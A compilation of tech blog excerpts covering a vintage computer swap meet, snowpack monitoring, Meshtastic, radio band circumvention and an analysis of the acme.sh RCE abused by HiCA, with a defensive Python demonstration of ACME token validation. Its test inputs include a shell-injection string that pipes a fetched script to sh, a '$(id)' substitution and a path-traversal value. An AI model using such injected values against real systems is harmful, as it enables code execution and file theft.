VCF’s Swap Meet Experiment Helps Support Expansion

There was a time when those looking for tech bargains had to either try their luck at the local flea market, or make the pilgrimage out to a dedicated swap meet. But with the rise of websites like eBay and Craigslist these parking lot meetups started to fall out of favor, to the point that they became all but extinct over the last couple of decades.

So there was some risk involved when the Vintage Computer Federation decided to dust off the concept as a way of sidestepping New Jersey’s COVID-era limitations on indoor meetups. But as VCF Vice President [Jeffrey Brace] explained during our visit earlier this month, the experiment has more than paid off. Each swap meet has brought in buyers and sellers from all over the Mid-Atlantic region, helping not only to raise money for the VCF’s ongoing preservation efforts, but to spread awareness of the organization and its goals.

The VCF hopes to expand their existing museum.

During our chat, [Jeffrey] goes over the origins and growth of the VCF swap meet, and how it compares to their annual Vintage Computer Festival. He also speaks about the Federation’s desire to expand their already impressive museum space into a far larger climate-controlled area that will allow for even more classic computer hardware to be put on display.

We visited the VCF swap meet back in 2021, and came away with the distinct impression that [Jeffrey] and the rest of the team had a winning idea on their hands. We’re happy to report that as of 2023 the areas where we saw room for improvement — namely the lack of on-site refreshment and a somewhat overly narrow focus on vintage hardware — have both been addressed. In its current form, this is truly a must-see event for anyone with an interest in computers, radio, or even just general electronics who happens to live within driving distance of the Jersey shore.

While eBay certainly makes it easy to bid on a piece of gear, you’re unlikely to make a new friend while doing so. Events like this are more than just a way to buy and sell hardware; they provide a chance for like-minded individuals to connect and build a community. We’re glad to see the event grow larger each year, and hope it inspires similar revivals elsewhere.


Know Snow: Monitoring Snowpack With The SNOTEL Network

With summer just underway here in North America, it may seem like a strange time to talk about snow. But when you live in North Idaho, winter is never very far away and is always very much on everyone’s mind. Our summers are fierce but all too brief, so starting around September, most of us begin to cast a wary eye at the peaks of the Bitterroot range in the mornings, looking for the first signs of snow. And in the late spring, we do much the same, except longingly looking for the first signs that the snowpack is finally breaking up.

We all know how important snow is, of course. Snow is our lifeline, nearly the only source of drinking water we have here, as well as the foundation of our outdoor recreation industries. We also know that the snowpack determines our risk for wildfires, so while the long, dark winters may take a psychological toll, the longer the snow stays on the mountains, the less chance we have of burning come summer.

These are all very subjective measures, though, and there’s way too much riding on the snowpack to leave it up to casual observation. To make things more quantitative, the US Department of Agriculture’s Natural Resources Conservation Service (NRCS) has built a system across the western US that measures the snowpack in real-time, and provides invaluable data to climatologists, fish and game managers, farmers, and even the recreation industry, all of whom have a vested interest in the water held within. The network is called SNOTEL, and I recently got a chance to take a field trip with a hydrologist and get an up-close look at how it works.


Meshtastic For The Greater Good

Last week, my city was hit by a tornado. That’s not surprising here in Oklahoma, and thankfully this event was an F0 or possibly even an EF0 — a really weak tornado. Only a couple roofs collapsed, though probably half the houses in town are going to need roof repairs, thanks to the combination of huge hail and high winds. While it wasn’t too bad, power did go down in a few places around town, and this led to an interesting series of events.

Chat messages were coming in like this: “That was a [power] flicker, yeah. Even took down my Internet.” Followed by “Whee, [fiber Internet] got knocked out and now Starlink has too many clouds in the way.” And after ten minutes of silence, we got a bit worried to see “Time to hide under a bed. … Is cell service back?” It is a bit spooky to think about trying to help neighbors and friends after a disaster, in the midst of the communication breakdown that often follows. If he had needed help, and had no working communications, how long would it have taken for us to go check on him?


Hackaday Links: June 25, 2023

Is it really a dystopian future if the robots are radio-controlled? That’s what came to mind reading this article on a police robot out of Singapore, complete with a breathless headline invoking Black Mirror, which is now apparently the standard by which all dystopias are to be judged. Granted, the episode with the robo-dogs was pretty terrifying, but it seems like the Singapore Police Force has a way to go before getting to that level. The bot, which has been fielded at Changi Airport after extensive testing and seems to be completely remote-controlled, is little more than a beefy telepresence robot. At 5.5 feet (1.7 meters) tall, the bot isn’t terribly imposing, although it apparently has a mast that can be jacked up another couple of feet, plus there are lights, sirens, and speakers that can get the message across. Plus cameras, of course; there are always cameras. The idea is to provide extra eyes to supplement foot patrols, plus the potential to cordon off an incident until meatspace officers arrive. The buzzword game here is weak, though; there’s no mention of AI or machine learning at all. We have a feeling that when the robots finally rise up, ones like this will be left serving the drinks.


Ham Pairs Nicely With GMRS

Ignoring all of the regulations, band allocations, and “best amateur practices,” there’s no real fundamental difference between the frequencies allocated to the Family Radio Service (FRS), the General Mobile Radio Service (GMRS), the Multi-Use Radio Service (MURS), and the two-meter and 70-centimeter bands allocated to licensed ham radio operators. The radio waves propagate over relatively short distances, don’t typically experience any skip, and are used for similar activities. The only major difference between these (at least in the Americas or ITU region 2) is the licenses you must hold to operate on the specific bands. This means that even though radios are prohibited by rule from operating across these bands, it’s often not too difficult to find radios that will do it anyway.

[Greg], aka [K4HSM], was experimenting with a TIDRADIO H8 meant for GMRS, which in North America is a service used for short-range two-way communication. No exams are required, but a license is still needed. GMRS also allows for the use of repeaters, making it more effective than the unlicensed FRS. GMRS radios, this one included, often can receive or scan frequencies they can’t transmit on, but in this case, the limits on transmitting are fairly easy to circumvent. While it isn’t allowed when programming the radio over Bluetooth, [K4HSM] found that programming it from the keypad directly will allow transmitting on the ham bands and uses it to contact his local two-meter and 70-cm repeaters as a proof-of-concept.

The surprising thing about this isn’t so much that the radio is physically capable of operating this way. What’s surprising is that this takes basically no physical modifications at all, and as far as we can tell, that violates at least one FCC rule. Whether or not that rule makes any sense is up for debate, and it’s not likely the FCC will break down your door for doing this since they have bigger fish to fry, but we’d definitely caution that it’s not technically legal to operate this way.


This Week In Security: ACME.sh, Leaking LEDs, And Android Apps

Let’s Encrypt has made an enormous difference to the landscape of the web. The protocol used for authenticating and receiving certificates, ACME, has spawned quite a few clients of various flavors. Some are written in Rust, some in Python or Go, and a few in straight Bash shell script. One of those last ones, acme.sh, was doing something odd when talking to a particular “Certificate Authority”, HiCA. This pseudo-CA only supports acme.sh, and now we know why. The folks behind HiCA found an RCE vulnerability in acme.sh, and decided to use that vulnerability to do certificate issuance with more “flexibility”. Oof.

The nuts and bolts here are that HiCA was working as a CA-in-the-Middle, wrapping other CAs’ authentication services. Those services don’t support HiCA’s ACME front end at all, so HiCA used the acme.sh vulnerability to put the authentication token in the place SSL.com expected to find it. So, just a good community member offering a service that ACME doesn’t quite support, right?

Well, maybe not so innocent. The way this appears to work is that the end user sends a certificate request to HiCA. HiCA takes that information and initiates a certificate request of its own to SSL.com. SSL.com sends back a challenge, and HiCA embeds that challenge in a response crafted to trigger the RCE, which it sends to the end user. The end user’s machine triggers the RCE, which pushes the challenge token to the well-known location, and that bypasses the ACME protection against exactly this sort of CA-in-the-middle situation: normally the client computes the challenge response using its own account key, which would be the wrong key for HiCA’s account at SSL.com.

The last piece of the authentication process is that the signing server reaches out over HTTP to the domain being certified, and looks for the token to be there. Once found, it sends the signed certificates to HiCA, who then forward them on to the end user. And that’s the problem. With arbitrary code execution on the client, HiCA was in a position to read the private key of every certificate it handled. A stolen key doesn’t by itself decrypt traffic protected by forward-secret cipher suites, but it could be used to impersonate those domains or to mount MitM attacks against them. There’s no evidence that HiCA was actually capturing or using those keys, but this company was abusing an RCE to put itself in a position to have that ability.

The takeaway is twofold. First, as an end user, only use reputable CAs. And second, ACME clients need to be hardened against potentially malicious CAs: every token, URL, and challenge field the CA sends is untrusted input and must be validated before it touches a shell or a filesystem path. The fact that HiCA only supported the one ACME client was what led to this discovery, and should have been a warning flag to anyone using the service.
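To make the CA-in-the-middle flow above concrete, here is an added example (not acme.sh or HiCA code) that models the HTTP-01 key authorization from RFC 8555 and the JWK thumbprint from RFC 7638. It shows why an honest client behind an intermediary fails the real CA’s check, why the intermediary needed code execution on the client to plant the right value, and what the token validation a hardened client should do looks like. The account keys and the token are constructed sample values, and the webroot is a plain dict standing in for a web server.

```python
"""
Added example (not acme.sh or HiCA code): why ACME's HTTP-01 key authorization
stops a CA-in-the-middle, and why an intermediary needs code execution on the
client to get around it. Keys and tokens are constructed sample values.
"""
import base64
import hashlib
import json
import re


def b64url(data: bytes) -> str:
    """Base64url without padding, as ACME uses everywhere."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


# Constructed sample account keys (public parts only, as JWKs). The coordinate
# bytes are arbitrary; only the fact that the two keys differ matters here.
CLIENT_JWK = {  # the end user's account key, registered with the intermediary
    "kty": "EC", "crv": "P-256",
    "x": b64url(b"\x01" * 32), "y": b64url(b"\x02" * 32),
}
PROXY_JWK = {  # the intermediary's own account key, registered with the real CA
    "kty": "EC", "crv": "P-256",
    "x": b64url(b"\x03" * 32), "y": b64url(b"\x04" * 32),
}


def jwk_thumbprint(jwk: dict) -> str:
    """RFC 7638: SHA-256 over the required members only, lexicographic order, no whitespace."""
    required = {"EC": ("crv", "kty", "x", "y"), "RSA": ("e", "kty", "n")}[jwk["kty"]]
    canonical = json.dumps({k: jwk[k] for k in required}, sort_keys=True, separators=(",", ":"))
    return b64url(hashlib.sha256(canonical.encode()).digest())


def key_authorization(token: str, account_jwk: dict) -> str:
    """RFC 8555 section 8.1: the value the CA expects at /.well-known/acme-challenge/<token>."""
    return f"{token}.{jwk_thumbprint(account_jwk)}"


# RFC 8555 section 8.3: the token is base64url with at least 128 bits of entropy
# (22 characters). A client should refuse anything else before the token is used
# in a path or, worse, interpolated into a shell command.
TOKEN_RE = re.compile(r"[A-Za-z0-9_-]{22,}")


def validate_token(token: str) -> str:
    if not TOKEN_RE.fullmatch(token):
        raise ValueError(f"refusing untrusted challenge token {token!r}")
    return token


def honest_client_serve(token: str, webroot: dict) -> None:
    """A correct client validates the token, then publishes the key
    authorization computed with ITS OWN account key."""
    token = validate_token(token)
    webroot[f"/.well-known/acme-challenge/{token}"] = key_authorization(token, CLIENT_JWK)


def upstream_ca_validate(token: str, webroot: dict) -> bool:
    """The real CA fetches the token path and compares it with the key
    authorization for the account that placed the order, i.e. the proxy's."""
    served = webroot.get(f"/.well-known/acme-challenge/{token}")
    return served == key_authorization(token, PROXY_JWK)


def simulate(token: str = "t0k3n-" + "a" * 26) -> dict:
    """Run the flow twice: once with an honest client behind the intermediary,
    once when the intermediary can write into the client's webroot directly,
    which is what the RCE gave it."""
    webroot = {}
    honest_client_serve(token, webroot)
    honest = upstream_ca_validate(token, webroot)  # False: thumbprint is the client's key, not the proxy's

    rce_webroot = {}
    # With code execution on the client, the intermediary plants the value the
    # real CA expects, computed with the intermediary's own account key.
    rce_webroot[f"/.well-known/acme-challenge/{token}"] = key_authorization(token, PROXY_JWK)
    bypassed = upstream_ca_validate(token, rce_webroot)  # True
    return {"honest_client_passes": honest, "rce_bypass_passes": bypassed}


if __name__ == "__main__":
    print(simulate())
    for bad in ("abc;curl http://x/|sh", "$(id)", "../../etc/passwd"):
        try:
            validate_token(bad)
        except ValueError as err:
            print(err)
```

The binding that defeats a plain proxy is the thumbprint in the key authorization: the client only knows its own account key, so whatever it publishes is wrong for the intermediary’s account at the real CA. Validating the token before use is not a complete hardening of an ACME client, but it is the minimum that keeps a CA-supplied string out of an `eval`.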

The Simplest Social Engineering Hack Of Them All

Here at Hackaday we cover news and interesting features for the hacker community, with an emphasis more on the hardware side. Nevertheless we also cover stories from time to time from the broader world of security. These usually involve vulnerabilities discovered through the patient work of software or hardware researchers, and are certainly what we’d call hacking. But what about those information security breaches that aren’t hacks like that at all? What happens when the person being breached simply gives you the information?

I’ve got one, and while it’s Not A Hack, it’s definitely something that we and those outside our community need to talk about. I’m talking about the depressingly common occurrence of organisations who should know better handing their letterhead to all and sundry in the form of freely editable Word documents.